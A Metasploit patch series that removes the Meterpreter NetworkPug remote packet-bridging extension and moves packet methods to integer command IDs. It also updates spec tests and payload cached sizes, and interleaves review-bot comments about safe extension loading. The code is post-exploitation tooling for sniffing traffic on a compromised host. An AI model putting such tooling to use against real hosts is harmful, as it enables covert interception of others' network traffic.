response.get_tlv_value(TLV_TYPE_CHANNEL_ID) - - if(channel_id) - channel = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new( - client, - channel_id, - 'networkpug_interface', - CHANNEL_FLAG_SYNCHRONOUS, - response - ) - end - - return response, channel - end - - def networkpug_stop(interface) - request = Packet.create_request(COMMAND_ID_NETWORKPUG_STOP) - request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface) - client.send_request(request) - end - -end - -end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb deleted file mode 100644 index 54e5941ab8ab9..0000000000000 --- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +++ /dev/null 
@@ -1,16 +0,0 @@ -# -*- coding: binary -*- -module Rex -module Post -module Meterpreter -module Extensions -module NetworkPug - -TLV_TYPE_EXTENSION_NETWORKPUG = 0 -TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1) -TLV_TYPE_NETWORKPUG_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2) - -end -end -end -end -end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb deleted file mode 100644 index 5782aed2d272a..0000000000000 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +++ /dev/null 
@@ -1,232 +0,0 @@ -# -*- coding: binary -*- -require 'rex/post/meterpreter' - -module Rex -module Post -module Meterpreter -module Ui - -# Rex::Ui::Text::IrbShell.new(binding).run - -class Console::CommandDispatcher::NetworkPug - - Klass = Console::CommandDispatcher::NetworkPug - - include Console::CommandDispatcher - - @@options = Rex::Parser::Arguments.new( - "-i" => [ true, "Interface on remote machine to listen on" ], - "-f" => [ true, "Additional pcap filtering mechanism" ], - "-v" => [ false, "Virtual NIC (packets only for your TAP dev locally)" ] - ) - - def initialize(shell) - @thread_stuff = nil - @tapdev = nil - @channel = nil - - super - end - - attr_accessor :thread_stuff - attr_accessor :tapdev - attr_accessor :channel - - - # - # List of supported commands. - # - def commands - { - 'networkpug_start' => 'Start slinging packets between hosts', - 'networkpug_stop' => 'Stop slinging packets between hosts', - } - end - - def setup_tapdev - # XXX, look at how to use windows equivilient and include - - tapdev = ::File.open("/dev/net/tun", "wb+") - - 0.upto(16) { |idx| - name = "npug#{idx}" - - ifreq = [ name, 0x1000 | 0x02, "" ].pack("a16va14") - - begin - tapdev.ioctl(0x400454ca, ifreq) # is there a better way than hex constant - rescue Errno::EBUSY - next - end - - ifreq = [ name ].pack("a32") - - tapdev.ioctl(0x8927, ifreq) - - # print_line(Rex::Text.hexify(ifreq)) - - mac = sprintf("%02x:%02x:%02x:%02x:%02x:%02x", ifreq[18], ifreq[19], ifreq[20], ifreq[21], ifreq[22], ifreq[23]) - - return tapdev, name, mac - } - - tapdev.close() - return nil, nil, nil - end - - def proxy_packets() - while True - # Ghetto :\ - - sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil) - - sd[0].each { |s| - if(s == @channel.lsock) # Packet from remote host to local TAP dev - len = @channel.lsock.read(2) - len = len.unpack('n')[0] - - #print_line("Got #{len} bytes from remote host's network") - - if(len > 1514 or len == 0) - @tapdev.close() - print_line("length 
is invalid .. #{len} ?, de-synchronized ? ") - end - - packet = @channel.lsock.read(len) - - print_line("packet from remote host:\n" + Rex::Text.hexify(packet)) - - @tapdev.syswrite(packet) - - elsif(s == @tapdev) - # Packet from tapdev to remote host network - - packet = @tapdev.sysread(1514) - - print_line("packet to remote host:\n" + Rex::Text.hexify(packet)) - - @channel.write(packet) - end - } if(sd) - - if(not sd) - print_line("hmmm. ") - end - end - end - - def cmd_networkpug_start(*args) - # PKS - I suck at ruby ;\ - - virtual_nic = false - filter = nil - interface = nil - - if(args.length == 0) - args.unshift("-h") - end - - @@options.parse(args) { |opt, idx, val| - # print_line("before: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}") - case opt - when "-v" - virtual_nic = true - - when "-f" - filter = val - - when "-i" - interface = val - - when "-h" - print_error("Usage: networkpug_start -i interface [options]") - print_error("") - print_error(@@options.usage) - end - # print_line("after: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}") - - } - - if (interface == nil) - print_error("Usage: networkpug_start -i interface [options]") - print_error("") - print_error(@@options.usage) - return - end - - @tapdev, tapname, mac = setup_tapdev - - if(@tapdev == nil) - print_status("Failed to create tapdev") - return - end - - # PKS, we should implement multiple filter strings and let the - # remote host build it properly. 
- # not (our conn) and (virtual nic filter) and (custom filter) - # print_line("before virtual, filter is #{filter}") - - if(filter == nil and virtual_nic == true) - filter = "ether host #{mac}" - elsif(filter != nil and virtual_nic == true) - filter += " and ether host #{mac}" - #print_line("Adjusted filter is #{filter}") - end - - print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done") - - _, @channel = client.networkpug.networkpug_start(interface, filter) - - if(@channel) - @thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) { - proxy_packets() - } - - print_line("Packet slinger for #{interface} has a thread structure of #{@thread_stuff}") - end - - return true - end - - def cmd_networkpug_stop(*args) - interface = args[0] - if (interface == nil) - print_error("Usage: networkpug_stop [interface]") - return - end - - client.networkpug.networkpug_stop(interface) - - #print_line("client.networkpug.networkpug_stop returned") - - if(@thread_stuff) - # print_line("killing thread") - @thread_stuff.kill - - #print_line("joining thread") - #@thread_stuff.join - # meterpreter dies if i try to join.. not sure why. - - @thread_stuff = nil - - #print_line("closing tapdev") - @tapdev.close - - #print_line("closing channel") - #@channel.close - end - - print_status("Packet slinging stopped on #{interface}") - return true - end - - def name - "NetworkPug" - end - -end - -end -end -end -end From 2ed4fa251f14e0c6ffe95eed087af48bf3267987 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 5 May 2020 10:59:46 +1000 Subject: [PATCH 07/20] Somehow lost a bang! Thanks @sempervictus --- lib/rex/post/meterpreter/extension_mapper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb index 320ab7fc2585d..2c6657913d890 100644 --- a/lib/rex/post/meterpreter/extension_mapper.rb +++ b/lib/rex/post/meterpreter/extension_mapper.rb 
@@ -14,7 +14,7 @@ def self.get_extension_id(name) end def self.get_extension_klass(name) - name.downcase + name.downcase! unless @@klasses[name] require("rex/post/meterpreter/extensions/#{name}/#{name}") From 616fdaeb603df0e6d0d554f1db154f654efa1b2d Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 5 May 2020 12:28:42 +1000 Subject: [PATCH 08/20] Fix up packe spec tests --- lib/rex/post/meterpreter/packet.rb | 4 +-- spec/lib/rex/post/meterpreter/packet_spec.rb | 30 ++++++++++---------- 2 files changed, 17 insertions(+), 17 deletions(-) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index f46fa6a4cef3a..f9e650dddb7c5 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -272,9 +272,9 @@ def inspect } tlvs_inspect << "]" else - tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}" + tlvs_inspect = "meta=#{meta.ljust(10)} value=#{val}" end - "#<#{self.class} type=#{stype} #{tlvs_inspect}>" + "#<#{self.class} type=#{stype.ljust(15)} #{tlvs_inspect}>" end ## diff --git a/spec/lib/rex/post/meterpreter/packet_spec.rb b/spec/lib/rex/post/meterpreter/packet_spec.rb index bd8dc1245104c..438a03873c1cc 100644 --- a/spec/lib/rex/post/meterpreter/packet_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_spec.rb @@ -117,19 +117,19 @@ end end - context "A Method TLV" do + context "A Command ID TLV" do subject(:tlv) { Rex::Post::Meterpreter::Tlv.new( - Rex::Post::Meterpreter::TLV_TYPE_METHOD, - "test" + Rex::Post::Meterpreter::TLV_TYPE_COMMAND_ID, + 31337 ) } - it "should have a meta type of String" do - expect(tlv.meta_type?(Rex::Post::Meterpreter::TLV_META_TYPE_STRING)).to eq true + it "should have a meta type of UINT" do + expect(tlv.meta_type?(Rex::Post::Meterpreter::TLV_META_TYPE_UINT)).to eq true end it "should show the correct type and meta type in inspect" do - tlv_to_s = "#" + tlv_to_s = "#" expect(tlv.inspect).to eq tlv_to_s end end 
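Review bot: `name.downcase!` in get_extension_klass mutates the caller's string in place and raises FrozenError if a caller ever passes a frozen string (for example a literal in a file with `# frozen_string_literal: true`), and its nil return on an already-lowercase name is a trap for anyone who later tries to chain it. Reassigning a local, `name = name.downcase`, fixes the original no-op in the same way without the side effect on the argument. Because the lowered name is then interpolated into the context line `require("rex/post/meterpreter/extensions/#{name}/#{name}")`, it is also worth confirming that every caller sources the name from the framework's known extension list rather than from session-supplied data. get_extension_klass continues outside the hunk.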
@@ -389,7 +389,7 @@ subject(:packet) { Rex::Post::Meterpreter::Packet.new( Rex::Post::Meterpreter::PACKET_TYPE_REQUEST, - "test_method" + 31337 ) } @@ -430,17 +430,17 @@ end it "should evaluate the method correctly" do - expect(packet.method?("test_method")).to eq true - expect(packet.method?("blah")).to eq false + expect(packet.method?(31337)).to eq true + expect(packet.method?(0xdead)).to eq false end it "should accept new methods" do - packet.method= "test_method2" - expect(packet.method?("test_method2")).to eq true + packet.method= 0xc0ffee + expect(packet.method?(0xc0ffee)).to eq true end it "should return the correct method" do - expect(packet.method).to eq "test_method" + expect(packet.method).to eq 31337 end it "should not have a result" do @@ -452,10 +452,10 @@ end it "should be created when Packet.create_request is called" do - req = Rex::Post::Meterpreter::Packet.create_request("test_method") + req = Rex::Post::Meterpreter::Packet.create_request(31337) expect(req.class).to eq Rex::Post::Meterpreter::Packet expect(req.response?).to eq false - expect(req.method?("test_method")).to eq true + expect(req.method?(31337)).to eq true end it "should return the correct raw byte form of the packet" do @@ -473,7 +473,7 @@ subject(:packet) { Rex::Post::Meterpreter::Packet.new( Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE, - "test_method" + 31337 ) } before(:example) do From 30a23c470b3b8d3b973adc95b7a570ffd970a4de Mon Sep 17 00:00:00 2001 
From: OJ Date: Tue, 5 May 2020 13:27:13 +1000 Subject: [PATCH 09/20] Update payload cache sizes --- modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/stagers/windows/encrypted_reverse_tcp.rb | 2 +- modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb | 2 +- 16 files changed, 16 insertions(+), 16 deletions(-) diff --git a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb index 2313a5a7d79e9..8e6c1f38e114c 100644 --- a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb @@ -11,7 +11,7 @@ module MetasploitModule - CachedSize = 4416 + CachedSize = 4352 include Msf::Payload::Windows include Msf::Payload::Single diff --git a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb index 844c0d8f993db..626c331b3c4df 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb 
+++ b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176195 + CachedSize = 176198 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 85aaeecafdf36..b84f131cf1bf8 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176195 + CachedSize = 176198 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 3dee4737f9eae..52a59ffbc536d 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 177241 + CachedSize = 177244 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 5bcac15bee097..d1efef0e15483 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 177241 + CachedSize = 177244 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 990e93e51da88..868c2ea691761 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb 
@@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176195 + CachedSize = 176198 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index edd181b0e674c..2a109914a82d2 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 176195 + CachedSize = 176198 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb index 53083adaf2475..8a921fe186205 100644 --- a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb @@ -10,7 +10,7 @@ module MetasploitModule - CachedSize = 4000 + CachedSize = 4064 include Msf::Payload::Windows include Msf::Payload::Single diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb index 743a8e8ef1a95..9d5b4a167ddb6 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201283 + CachedSize = 201286 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index dc832d5f59a30..2473cb95a0243 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb 
@@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201283 + CachedSize = 201286 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index d2e5281294cc7..7dd31a44a4c4e 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 202329 + CachedSize = 202332 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index d36ec6555234e..21c0aa7535d04 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 202329 + CachedSize = 202332 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 9e23dae59f3a1..a6f5a125f1745 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201283 + CachedSize = 201286 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index a486a85665eab..2a1139d0f92fe 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb 
@@ -12,7 +12,7 @@ module MetasploitModule - CachedSize = 201283 + CachedSize = 201286 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb index dd2c8e7f0d3f1..6ae7561f887e8 100644 --- a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb +++ b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule - CachedSize = 2880 + CachedSize = 2848 include Msf::Payload::Stager include Msf::Payload::Windows::EncryptedReverseTcp diff --git a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb index 67fb7bb327647..74f709532087b 100644 --- a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb @@ -8,7 +8,7 @@ module MetasploitModule - CachedSize = 2560 + CachedSize = 2576 include Msf::Payload::Stager include Msf::Payload::Windows::EncryptedReverseTcp From c08e86434b02a92250eb1ec70f5613facbf1c18f Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 5 May 2020 14:23:32 +1000 Subject: [PATCH 10/20] Fix more specs --- lib/rex/post/meterpreter/extension_mapper.rb | 7 ++++++- lib/rex/post/meterpreter/packet.rb | 1 + spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/extension_mapper.rb b/lib/rex/post/meterpreter/extension_mapper.rb index 2c6657913d890..057ff9c9853a5 100644 --- a/lib/rex/post/meterpreter/extension_mapper.rb +++ b/lib/rex/post/meterpreter/extension_mapper.rb 
@@ -17,7 +17,12 @@ def self.get_extension_klass(name)
 name.downcase!
 unless @@klasses[name]
- require("rex/post/meterpreter/extensions/#{name}/#{name}")
+ begin
+ require("rex/post/meterpreter/extensions/#{name}/#{name}")
+ rescue LoadError
+ # the extension doesn't exist on disk
+ raise RuntimeError, "Unable to load extension '#{name}' - module does not exist."
+ end
 s = Rex::Post::Meterpreter::Extensions.constants.select { |c| name == c.to_s.downcase }[0]
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index f9e650dddb7c5..8d1e20df7c163 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -914,6 +914,7 @@ def method?(method)
 # Sets the packet's method TLV to the method supplied.
 #
 def method=(method)
+ raise ArgumentError.new('Packet.method must be an integer') unless method.is_a?(Integer)
 add_tlv(TLV_TYPE_COMMAND_ID, method, true)
 end
diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
index c45496a4cf090..2e8f1b039391b 100644
--- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
+++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb
@@ -8,7 +8,7 @@
 Rex::Post::Meterpreter::PacketParser.new
 }
 before(:example) do
- @request_packet = Rex::Post::Meterpreter::Packet.create_request("test_method")
+ @request_packet = Rex::Post::Meterpreter::Packet.create_request(31337)
 @sock = StringIO.new(@request_packet.to_r)
 end
@@ -19,7 +19,7 @@
 parsed_packet.from_r
 expect(parsed_packet).to be_a Rex::Post::Meterpreter::Packet
 expect(parsed_packet.type).to eq Rex::Post::Meterpreter::PACKET_TYPE_REQUEST
- expect(parsed_packet.method?("test_method")).to eq true
+ expect(parsed_packet.method?(31337)).to eq true
 end
 end
From 19f771f6ec39d56fa2c623182b8231ae827e2b4a Mon Sep 17 00:00:00 2001
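Review bot: The extension name is still interpolated unvalidated into the load path in `require("rex/post/meterpreter/extensions/#{name}/#{name}")`, and the new `rescue LoadError` reports every LoadError as "module does not exist", which also hides a genuine failure inside an existing extension file (for example a dependency it requires that is missing) behind a misleading message. If `name` can be influenced from outside the framework, for instance an extension name reported by a remote session, a value containing `/` or `..` would turn this into a caller-controlled require; I cannot see the callers from here, so treat that as something to confirm. Rejecting anything outside `[a-z0-9_]` before the interpolation closes the question either way, and carrying the original LoadError text into the new error keeps real load failures diagnosable. `get_extension_klass` begins and ends outside the hunk.
```ruby
    unless name =~ /\A[a-z0-9_]+\z/
      raise ArgumentError, "Invalid extension name '#{name}'"
    end
    begin
      require("rex/post/meterpreter/extensions/#{name}/#{name}")
    rescue LoadError => e
      # the extension, or something it requires, could not be loaded
      raise RuntimeError, "Unable to load extension '#{name}' - #{e.message}"
    end
    # … unchanged: constant lookup in Rex::Post::Meterpreter::Extensions …
```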
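Review bot: The new guard in `method=` accepts any Integer, so a negative value or one wider than the wire field passes the check; if TLV_TYPE_COMMAND_ID is packed as a fixed-width unsigned integer when the packet is serialised (I cannot see the TLV definition from here) such a value would be silently truncated on the wire rather than rejected at the point of the mistake. Consider `raise ArgumentError, 'Packet.method must be a non-negative integer' unless method.is_a?(Integer) && method >= 0`. The two-argument `raise ArgumentError, message` form also matches the `raise RuntimeError, "..."` style used in the extension_mapper hunk above, whereas `ArgumentError.new(...)` allocates the exception by hand for no benefit.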
From: OJ
Date: Fri, 8 May 2020 14:43:41 +1000
Subject: [PATCH 11/20] Fix missed cases of method strings
---
 lib/rex/post/meterpreter/channel.rb | 8 ++++----
 lib/rex/post/meterpreter/channels/socket_abstraction.rb | 2 +-
 lib/rex/post/meterpreter/packet_dispatcher.rb | 2 +-
 3 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb
index eb1be874cd9e1..fc6accad0efa4 100644
--- a/lib/rex/post/meterpreter/channel.rb
+++ b/lib/rex/post/meterpreter/channel.rb
@@ -397,12 +397,12 @@ def dio_close_handler(packet)
 # per-instance basis as other instances may add custom dio
 # handlers.
 #
- def dio_map(method)
- if (method == 'core_channel_read')
+ def dio_map(command_id)
+ if command_id == COMMAND_ID_CORE_CHANNEL_READ
 return CHANNEL_DIO_READ
- elsif (method == 'core_channel_write')
+ elsif command_id == COMMAND_ID_CORE_CHANNEL_WRITE
 return CHANNEL_DIO_WRITE
- elsif (method == 'core_channel_close')
+ elsif command_id == COMMAND_ID_CORE_CHANNEL_CLOSE
 return CHANNEL_DIO_CLOSE
 end
diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb
index c073303d03ec5..3320c105e5deb 100644
--- a/lib/rex/post/meterpreter/channels/socket_abstraction.rb
+++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb
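Review bot: The rewritten `dio_map` still dispatches one value through an `if`/`elsif` chain of equality tests with explicit `return`s; now that the comparisons are against integer constants rather than strings this is exactly the shape Ruby's `case`/`when` is for, and it reads as a table instead of three conditionals. The fall-through value after the chain and the method's closing `end` are outside the hunk, so only the chain itself is shown rewritten. Behaviour is unchanged; this is purely how the new code is written.
```ruby
    def dio_map(command_id)
      case command_id
      when COMMAND_ID_CORE_CHANNEL_READ  then return CHANNEL_DIO_READ
      when COMMAND_ID_CORE_CHANNEL_WRITE then return CHANNEL_DIO_WRITE
      when COMMAND_ID_CORE_CHANNEL_CLOSE then return CHANNEL_DIO_CLOSE
      end
      # … unchanged: fall-through return, outside the hunk …
```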
@@ -89,7 +89,7 @@ def syswrite(buf)
 def initialize(client, cid, type, flags, packet, **_)
 # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called
 # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel
- # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write'
+ # is registered (client.add_channel(self) in Channel.initialize) to a session and a COMMAND_ID_CORE_CHANNEL_WRITE
 # request comes in before we have called self.initialize_abstraction()
 initialize_abstraction
 super(client, cid, type, flags, packet)
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index c37c5fdd12ee1..c96f8ad06fd2f 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -369,7 +369,7 @@ def monitor_socket
 tmp_command << pkt
 next
 end
- if(pkt.method == "core_channel_close")
+ if(pkt.method == COMMAND_ID_CORE_CHANNEL_CLOSE)
 tmp_close << pkt
 next
 end
From b9013e32fa1e02c55fbbc8c012820ccbdc59aaa5 Mon Sep 17 00:00:00 2001
From: OJ
Date: Fri, 8 May 2020 21:56:18 +1000
Subject: [PATCH 12/20] Re-remove the filter on the sniffer extension
Not sure why, but this is causing issues. Gross.
---
 .../ui/console/command_dispatcher/sniffer.rb | 20 +++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index a8d1a44898755..c9c6f190b9438 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -30,7 +30,7 @@ def initialize(shell)
 # List of supported commands.
 #
 def commands
- all = {
+ {
 'sniffer_interfaces' => 'Enumerate all sniffable network interfaces',
 'sniffer_start' => 'Start packet capture on a specific interface',
 'sniffer_stop' => 'Stop packet capture on a specific interface',
@@ -39,16 +39,16 @@ def commands
 'sniffer_release' => 'Free captured packets on a specific interface instead of downloading them',
 }
- reqs = {
- 'sniffer_interfaces' => [COMMAND_ID_SNIFFER_INTERFACES],
- 'sniffer_start' => [COMMAND_ID_SNIFFER_CAPTURE_START],
- 'sniffer_stop' => [COMMAND_ID_SNIFFER_CAPTURE_STOP],
- 'sniffer_stats' => [COMMAND_ID_SNIFFER_CAPTURE_STATS],
- 'sniffer_dump' => [COMMAND_ID_SNIFFER_CAPTURE_DUMP],
- 'sniffer_release' => [COMMAND_ID_SNIFFER_CAPTURE_RELEASE],
- }
+ #reqs = {
+ # 'sniffer_interfaces' => [COMMAND_ID_SNIFFER_INTERFACES],
+ # 'sniffer_start' => [COMMAND_ID_SNIFFER_CAPTURE_START],
+ # 'sniffer_stop' => [COMMAND_ID_SNIFFER_CAPTURE_STOP],
+ # 'sniffer_stats' => [COMMAND_ID_SNIFFER_CAPTURE_STATS],
+ # 'sniffer_dump' => [COMMAND_ID_SNIFFER_CAPTURE_DUMP],
+ # 'sniffer_release' => [COMMAND_ID_SNIFFER_CAPTURE_RELEASE],
+ #}
- filter_commands(all, reqs)
+ #filter_commands(all, reqs)
 end
From 10529c8b7a8d54a3e0b779962d7942d205832f2c Mon Sep 17 00:00:00 2001
From: OJ
Date: Mon, 18 May 2020 08:34:59 +1000
Subject: [PATCH 13/20] Fix silly typo in the android extension dispatcher
---
 .../post/meterpreter/ui/console/command_dispatcher/android.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 5a55b076ef228..5830f967b4b00 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
